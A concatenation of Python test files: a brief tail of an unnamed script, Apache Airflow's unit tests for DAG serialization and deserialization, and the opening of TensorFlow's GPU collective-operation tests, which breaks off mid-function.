# browser_thread.join()
logging.debug("Done - debug")
#logging.info("Done - info") |
test_dag_serialization.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import importlib
import importlib.util
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta, timezone
from glob import glob
from unittest import mock
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from parameterized import parameterized
from airflow.hooks.base_hook import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator
from airflow.operators.bash import BashOperator
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(containers=[
k8s.V1Container(
name="base",
volume_mounts=[
k8s.V1VolumeMount(
name="my-vol",
mount_path="/vol/"
)
]
)
]))
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {
"__type": "timedelta",
"__var": 300.0
}
}
},
"start_date": 1564617600.0,
'_task_group': {'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'),
'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': []},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {'__type': 'dict',
'__var': {"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod)}
}
}
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [
"can_read",
"can_edit"
]
}
}
}
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"depends_on_past": False,
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={
"test_role": {"can_read", "can_edit"}
}
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(task_id='bash_task', bash_command='echo {{ task.task_id }}', owner='airflow',
executor_config={"pod_override": executor_config_pod})
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {
'start_date': datetime(2019, 7, 10)
}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={
'hello': lambda name: 'Hello %s' % name
},
catchup=False
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=('{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}')))
self.maxDiff = None # pylint: disable=invalid-name
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(
serialized_dags['simple_dag'],
serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
self.assertTrue(
json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py')
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"],
key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
@pytest.mark.quarantined
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(
target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
self.assertTrue(isinstance(dag, DAG))
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags([
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
])
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
"_task_group"
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(dag, field), \
f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert v == serialized_dag.default_args[k], \
f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(self, serialized_task, task,):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type', 'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback', 'on_success_callback', 'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(task, field), \
f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand([
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc)),
(datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc)),
])
def test_deserialization_start_date(self,
dag_start_date,
task_start_date,
expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
self.assertNotIn("start_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("start_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.start_date, expected_task_start_date)
@parameterized.expand([
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc)),
(datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc)),
])
def test_deserialization_end_date(self,
dag_end_date,
task_end_date,
expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1),
end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
self.assertNotIn("end_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("end_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.end_date, expected_task_end_date)
@parameterized.expand([
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
])
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
self.assertEqual(dag.schedule_interval, expected_schedule_interval)
self.assertEqual(dag.normalized_schedule_interval, expected_n_schedule_interval)
@parameterized.expand([
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}})
])
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
self.assertDictEqual(serialized, expected)
round_tripped = SerializedDAG._deserialize(serialized)
self.assertEqual(val, round_tripped)
@parameterized.expand([
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
])
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"])
else:
self.assertNotIn("params", serialized_dag["dag"])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_dag.params)
self.assertEqual(expected_val, deserialized_simple_task.params)
@parameterized.expand([
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
])
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val,
start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"]["tasks"][0])
else:
self.assertNotIn("params", serialized_dag["dag"]["tasks"][0])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_simple_task.params)
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), "true")
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[{'tests.test_utils.mock_operators.CustomOpLink': {}}]
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, ['Google Custom', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
self.assertEqual('http://google.com/custom_base_link?search=dummy_value_1', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), ["echo", "true"])
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, [
'BigQuery Console #1', 'BigQuery Console #2', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_1', custom_inbuilt_link)
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_2', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
class ClassWithCustomAttributes:
"""
Class for testing purpose: allows to create objects with custom attributes in one single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return "{}({})".format(self.__class__.__name__, str(self.__dict__))
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand([
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}}),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(nested1=ClassWithCustomAttributes(att1="{{ task.task_id }}",
att2="{{ task.task_id }}",
template_fields=["att1"]),
nested2=ClassWithCustomAttributes(att3="{{ task.task_id }}",
att4="{{ task.task_id }}",
template_fields=["att3"]),
template_fields=["nested1"]),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', "
"'att4': '{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
])
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.)
we want check that non-"basic" objects are turned in to strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
self.assertEqual(expected_field, getattr(deserialized_test_task, "bash_command"))
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization needs to be ignored
ignored_keys: set = {"is_subdag", "tasks"}
dag_params: set = set(dag_schema.keys()) - ignored_keys
self.assertEqual(set(DAG.get_serialized_fields()), dag_params)
def test_operator_subclass_changing_base_defaults(self):
assert BaseOperator(task_id='dummy').do_xcom_push is True, \
"Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that there are no new fields added to BaseOperator. And reminds that
tests should be added for it.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
self.assertEqual({'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream'}, fields,
"""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
)
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
collective_ops_gpu_test.py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Collective Operations that require GPU."""
import os
import threading
import time
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import collective_ops
from tensorflow.python.platform import test
class CollectiveOpGPUTest(test.TestCase):
@classmethod
def setUpClass(cls):
"""Set group_size = num_gpus = 2 for all tests in this class."""
super(CollectiveOpGPUTest, cls).setUpClass()
# Group size is the number of devices in a group communicating collectively.
# This will be passed into the collective ops in the tests below.
cls._group_size = 2
cls._devices = ['/device:GPU:{}'.format(i) for i in range(2)]
os.environ['NCCL_DEBUG'] = 'INFO'
os.environ['NCCL_LAUNCH_MODE'] = 'PARALLEL'
def _setup_context(self, num_gpus=2):
context._reset_context()
gpus = config.list_physical_devices('GPU')
if len(gpus) < num_gpus:
self.skipTest('Expected at least {} GPUs but found {} GPUs'.format(
num_gpus, len(gpus)))
context.ensure_initialized()
def testBasicNcclAllReduce(self):
self._setup_context()
inputs = [[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]]
expected = [0.2, 1.2, 2.2, 3.2, 4.2, 5.2, 6.2, 7.2]
group_key = 1
instance_key = 1
@def_function.function
def run_basic_all_reduce():
collectives = []
for i in range(self._group_size):
with ops.device(self._devices[i]):
t = constant_op.constant(inputs[i])
collectives.append(collective_ops.all_reduce(
t, self._group_size, group_key, instance_key, 'Add', 'Div'))
return collectives
for result in run_basic_all_reduce():
self.assertAllClose(result, expected, rtol=1e-5, atol=1e-5)
def testInt32Error(self):
self._setup_context()
inputs = [[0, 1], [2, 3]]
group_key = 1
instance_key = 50
@def_function.function
def run_int32_error():
for i in range(self._group_size):
with ops.device(self._devices[i]):
t = constant_op.constant(inputs[i], dtype=dtypes.int32)
collective_ops.all_reduce(
t, self._group_size, group_key, instance_key, 'Add', 'Div')
with self.assertRaisesRegex(
errors.InternalError,
'does not support datatype DT_INT32 on DEVICE_GPU'):
run_int32_error()
def testFp16Reduce(self):
self._setup_context()
inputs = [[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]]
expected = [0.2, 1.2, 2.2, 3.2, 4.2, 5.2, 6.2, 7.2]
group_key = 1
instance_key = 100
@def_function.function
def run_fp16_reduce():
collectives = []
for i in range(self._group_size):
with ops.device(self._devices[i]):
t = constant_op.constant(inputs[i], dtype=dtypes.float16)
